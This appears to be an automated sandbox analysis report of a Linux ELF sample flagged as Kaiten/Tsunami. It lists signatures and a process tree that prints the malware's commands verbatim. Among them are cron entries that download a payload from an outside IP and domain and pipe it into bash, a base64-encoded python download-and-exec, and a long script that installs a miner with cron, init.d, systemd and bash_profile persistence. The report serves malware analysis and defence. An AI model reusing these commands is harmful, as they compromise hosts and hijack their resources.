Analysis
-
max time kernel
145s -
max time network
151s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
-
submitted
25-02-2024 05:07
General
-
Target
96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a.elf
-
Size
3.8MB
-
MD5
1184bf04877dec9a4bbb24acd30c8d49
-
SHA1
e68649a61a173c93775580ec0e975a3a87250e9d
-
SHA256
96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a
-
SHA512
25917099b31a0bd7b3fab4600c318c3a3acab5bb1c2dc8d7fbccfc22046fb7a551747065ad9016dba26d8de16a0782d4a7279a5b644c7802f4151c4d3184d104
-
SSDEEP
98304:e6M0JGEyxYXQKOscf3j3/DaNAq//XxsdQDYpexnaG4oDhAJ:i0JZ8yysw3zDuTXqQD+exawDhY
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
-
Detects Kaiten/Tsunami payload 1 IoCs
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
Executes dropped EXE 4 IoCs
-
Reads EFI boot settings 10 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Attempts to change immutable files 14 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Checks CPU configuration 1 TTPs 6 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Checks hardware identifiers (DMI) 1 TTPs 8 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 15 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies init.d 1 TTPs 3 IoCs
Adds/modifies system service, likely for persistence.
-
Modifies systemd 1 TTPs 3 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Reads CPU attributes 1 TTPs 12 IoCs
-
Reads hardware information 1 TTPs 28 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Writes file to system bin folder 1 TTPs 5 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
-
GoLang User-Agent 15 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes
-
/tmp/96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a.elf/tmp/96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a.elf1⤵
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
-
/usr/bin/bashbash -c "rm -rf /etc/sysctl.conf ; echo fs.file-max = 2097152 > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999"2⤵
-
/usr/bin/rmrm -rf /etc/sysctl.conf3⤵
-
-
/usr/sbin/sysctlsysctl -p3⤵
-
-
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵
-
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
-
/usr/bin/cpcp -f -r -- /bin/knlib /bin/klibsystem43⤵
-
-
/usr/bin/rmrm -rf -- klibsystem43⤵
-
-
/usr/bin/nohupnohup ./klibsystem43⤵
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl enable knlibe.service2⤵
- Reads EFI boot settings
-
-
/usr/bin/chattrchattr +ia /bin/knlib2⤵
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/ssss -ant2⤵
-
-
/usr/bin/klibsystem4./klibsystem41⤵
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://185.172.128.146:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/nohupnohup /tmp/bi.64 "&"1⤵
-
/tmp/bi.64/tmp/bi.64 "&"1⤵
- Executes dropped EXE
- Writes file to tmp directory
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/nohupnohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"1⤵
-
/tmp/bin.64/tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
-
/usr/bin/whoamiwhoami3⤵
-
-
/usr/bin/hostnamehostname3⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/grepgrep -v grep3⤵
-
-
/usr/bin/grepgrep /etc/cron3⤵
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/bin.64';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /bin/bprofr3⤵
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵
- Attempts to change immutable files
-
-
/usr/bin/cpcp -f -r -- /tmp/bin.64 /bin/bprofr3⤵
- Writes file to system bin folder
-
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr3⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /bin/crondr3⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/bin.64 /bin/crondr3⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Attempts to change immutable files
- Creates/modifies Cron job
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
- Attempts to change immutable files
-
-
/usr/bin/whichwhich chkconfig3⤵
-
-
/usr/bin/whichwhich update-rc.d3⤵
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
- Reads runtime system information
-
-
-
/usr/bin/rmrm -rf /bin/initdr3⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/bin.64 /bin/initdr3⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Attempts to change immutable files
- Modifies init.d
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
- Reads runtime system information
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig4⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig4⤵
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig4⤵
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig4⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
-
-
/usr/bin/whichwhich systemctl3⤵
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /bin/sysdr3⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/bin.64 /bin/sysdr3⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
- Attempts to change immutable files
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service3⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service3⤵
- Reads EFI boot settings
- Reads runtime system information
-
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
-
-
-
/usr/bin/hostnamehostname -I1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/nohupnohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"1⤵
-
/tmp/bin.64/tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d "&"1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
- Attempts to change immutable files
-
/usr/bin/whoamiwhoami3⤵
-
-
/usr/bin/hostnamehostname3⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/grepgrep -v grep3⤵
-
-
/usr/bin/grepgrep /etc/cron3⤵
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/idid -u3⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵
-
-
/usr/bin/grepgrep -v grep3⤵
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
-
/usr/bin/idid -u3⤵
-
-
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/wcwc -l1⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵
-
/usr/bin/grepgrep -v grep1⤵
-
/usr/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/ssss -ant1⤵
-
/usr/bin/ssss -ant1⤵
-
